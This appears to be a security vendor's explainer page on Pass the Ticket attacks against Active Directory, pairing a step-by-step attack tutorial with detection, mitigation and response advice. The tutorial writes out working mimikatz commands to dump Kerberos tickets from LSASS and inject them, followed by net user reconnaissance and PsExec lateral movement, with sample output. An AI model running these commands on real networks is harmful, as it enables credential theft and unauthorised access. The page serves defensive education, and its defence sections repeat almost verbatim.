Netwrix Auditor 
Netwrix Enterprise Auditor 
Netwrix Data Classification 
Netwrix GroupID 
Netwrix Privilege Secure 
Netwrix Endpoint Protector 
Pass the Ticket Attack
Pass the Ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. Adversaries often use this technique to move laterally through an organization’s network to hunt for opportunities to escalate their privileges or fulfill their mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.
Threat Summary
Target:
Active Directory
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Medium
Mitigation:
Hard
Response:
Medium
Attack Tutorial: How Pass the Ticket Attacks Work
STEP 1
Steal a user’s ticket
An adversary uses a tool like Mimikatz to extract Kerberos tickets from the memory of the LSASS.exe process:
########
# To capture TGTs, this invocation of mimikatz must be run from an elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen and also writes them individually to files
# in the current directory. We have truncated the output to show a single session.
#########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session : RemoteInteractive from 4
User Name : joed
Domain : DOMAIN
Logon Server : DC1
Logon Time : 03/07/2020 08:07:58
SID : S-1-5-21-3501040295-3816137123-30697657-1109
* Username : joed
* Domain : DOMAIN.COM
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
Target Name (03) : host ; host.domain.com ; @ DOMAIN.COM
Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
Target Name (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>
STEP 2
Reuse the ticket
Next, the threat actor uses
mimikatz.exe kerberos::ptt or a tool with similar capabilities to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources:PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
Server Name : krbtgt/DOMAIN.COM @ DOMAIN.COM
Client Name : joed @ DOMAIN.COM
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS>
STEP 3
Conduct internal reconnaissance
Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used:
A stolen TGS can be used to access only the resource it was issued for, and an adversary can determine that information by inspecting the TGS itself.
To use a stolen TGT, however, the attacker may need to conduct internal reconnaissance to determine what access it provides. This may be as straightforward as querying the user’s group memberships and looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can also use built-in commands like net to discover these details:
A stolen TGS can be used to access only the resource it was issued for, and an adversary can determine that information by inspecting the TGS itself.
To use a stolen TGT, however, the attacker may need to conduct internal reconnaissance to determine what access it provides. This may be as straightforward as querying the user’s group memberships and looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can also use built-in commands like net to discover these details:
PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
User name joed
Full Name Joe Dibley
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/15/2020 3:42:00 PM
Password expires Never
Password changeable 6/16/2020 3:42:00 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/9/2020 6:26:56 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Workstation Administrators *VPNUser
*FileServer1_PublicShare *Domain Users
The command completed successfully.
PS>
STEP 4
Access resources as the user
Finally, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives:
PS> .\PsExec.exe \\workstation456 powershell.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS> hostname
workstation456
PS>Detect, Mitigate and Respond
Detect
Mitigate
Respond
Difficulty:
Medium
Endpoints and Active Directory are both sources of signals indicating active use of Pass the Ticket attacks.
It is not possible to detect the theft and use of a single TGS in Active Directory.
Detection on endpoints
Options include the following:
- Detect the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many endpoint detection and response solutions are capable of this.
- Analyze logged-on sessions for a username mismatch between the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.
Detection in Active Directory
Collect and correlate Kerberos events, as follows:
- Develop a ledger that records when and on which endpoint each ticket granting ticket (TGT) was issued. To do so, audit the following events:
- ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
- ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
- Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. To do so, audit the following events:
- ‘A Kerberos Service Ticket was requested’ (Event ID 4769)
- ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
It is not possible to detect the theft and use of a single TGS in Active Directory.
Difficulty:
Hard
The best mitigation tactics focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and permit only trusted processes to access them.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Difficulty:
Medium
Options for responding to a detected use of Pass the Ticket include the following:
- Reset the password of the compromised user account, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
- Reset the password for all users who have logged on to an impacted machine.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
- Activate the incident response process and alert the response team.
Detect
Difficulty:
Medium
Endpoints and Active Directory are both sources of signals indicating active use of Pass the Ticket attacks.
It is not possible to detect the theft and use of a single TGS in Active Directory.
Detection on endpoints
Options include the following:
- Detect the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many endpoint detection and response solutions are capable of this.
- Analyze logged-on sessions for a username mismatch between the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.
Detection in Active Directory
Collect and correlate Kerberos events, as follows:
- Develop a ledger that records when and on which endpoint each ticket granting ticket (TGT) was issued. To do so, audit the following events:
- ‘A Kerberos Authentication Ticket (TGT) was requested’ (Event ID 4768)
- ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
- Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. To do so, audit the following events:
- ‘A Kerberos Service Ticket was requested’ (Event ID 4769)
- ‘A Kerberos Service Ticket was renewed’ (Event ID 4770)
It is not possible to detect the theft and use of a single TGS in Active Directory.
Mitigate
Difficulty:
Hard
The best mitigation tactics focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and permit only trusted processes to access them.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Respond
Difficulty:
Medium
Options for responding to a detected use of Pass the Ticket include the following:
- Reset the password of the compromised user account, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
- Reset the password for all users who have logged on to an impacted machine.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
- Activate the incident response process and alert the response team.
Featured Solutions
OTHER ATTACKS
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.